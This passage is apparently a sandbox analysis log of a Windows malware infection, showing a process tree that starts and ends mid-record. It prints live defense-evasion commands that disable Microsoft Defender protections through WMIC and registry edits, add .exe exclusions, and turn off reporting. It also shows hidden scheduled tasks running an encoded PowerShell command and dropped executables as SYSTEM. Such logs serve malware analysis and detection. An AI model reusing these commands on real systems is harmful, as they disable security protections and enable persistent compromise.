        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
        14⤵
        
        PID:7344
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        15⤵
        
        PID:7632
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        16⤵
        
        PID:7784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        17⤵
        
        PID:7948
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        18⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
        15⤵
        
        PID:6632
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        16⤵
        
        PID:7028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        17⤵
        
        PID:7084
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        18⤵
        
        PID:7180
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
        15⤵
        
        PID:4924
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        16⤵
        
        PID:5524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        17⤵
        
        PID:7108
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        18⤵
        
        PID:7588
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
        15⤵
        
        PID:6504
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        16⤵
        
        PID:8040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        17⤵
        
        PID:6804
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        18⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        14⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        15⤵
        
        PID:5108
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        16⤵
        
        PID:7224
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        16⤵
        
        PID:7328
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        14⤵
        
        PID:8036
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        15⤵
        
        PID:8132
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        16⤵
        
        PID:6700
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        16⤵
        
        PID:8136
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gBAQvvrnh" /SC once /ST 02:24:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        14⤵
        Creates scheduled task(s)
        
        PID:6604
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gBAQvvrnh"
        14⤵
        
        PID:7908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        Executes dropped EXE
        
        PID:4728
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gBAQvvrnh"
        14⤵
        
        PID:5592
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bCQQUSYoXLKlZTQVFm" /SC once /ST 07:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\WcEadxDpHtEHjlL\KXOTaKB.exe\" 8e /site_id 216660 /S" /V1 /F
        14⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:2228
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\14as3yst.u01\gcleaner.exe /mixfive & exit
        10⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Local\Temp\14as3yst.u01\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\14as3yst.u01\gcleaner.exe /mixfive
        11⤵
        Executes dropped EXE
        
        PID:7424
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ujgikaf.w3k\autosubplayer.exe /S & exit
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7196
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3024
      - C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05899db881f67fb29.exe
        
        Sun05899db881f67fb29.exe
        6⤵
        Executes dropped EXE
        
        PID:3288
- C:\Users\Admin\AppData\Local\Temp\48C2.exe
  C:\Users\Admin\AppData\Local\Temp\48C2.exe
  2⤵
  - Executes dropped EXE
  PID:4224
- C:\Users\Admin\AppData\Local\Temp\57D6.exe
  C:\Users\Admin\AppData\Local\Temp\57D6.exe
  2⤵
  - Executes dropped EXE
  PID:6164
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Executes dropped EXE
    PID:4488
- C:\Users\Admin\AppData\Local\Temp\CF78.exe
  C:\Users\Admin\AppData\Local\Temp\CF78.exe
  2⤵
  - Loads dropped DLL
  PID:7868
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\CF78.exe"
    3⤵
    PID:1116
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:6232
- C:\Users\Admin\AppData\Local\Temp\B98.exe
  C:\Users\Admin\AppData\Local\Temp\B98.exe
  2⤵
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:8008
- C:\Users\Admin\AppData\Local\Temp\202A.exe
  C:\Users\Admin\AppData\Local\Temp\202A.exe
  2⤵
  PID:4880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
- Suspicious use of SetThreadContext
PID:2684
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:4576

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2628

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2336

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1956

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1404

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1344

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:7848
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:6968
- C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\WcEadxDpHtEHjlL\KXOTaKB.exe
  C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\WcEadxDpHtEHjlL\KXOTaKB.exe 8e /site_id 216660 /S
  2⤵
  - Drops file in System32 directory
  PID:5772
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
    3⤵
    PID:7984
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:3304
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:7052
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:7496
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:5092
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:1908
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:7072
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2640
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:6792
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:7504
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:4284
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:7568
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:4732
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:6292
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:4932
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5964
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:5688
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:6984
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6212
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        5⤵
        
        PID:6588
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:6232
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:192
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:7728
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4420
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:1208
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2020
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:856
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2612
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:4912
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6108
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:6604
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4996
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:6288
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4740
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
      4⤵
      Executes dropped EXE
      PID:4172
  - - C:\Windows\SysWOW64\reg.exe
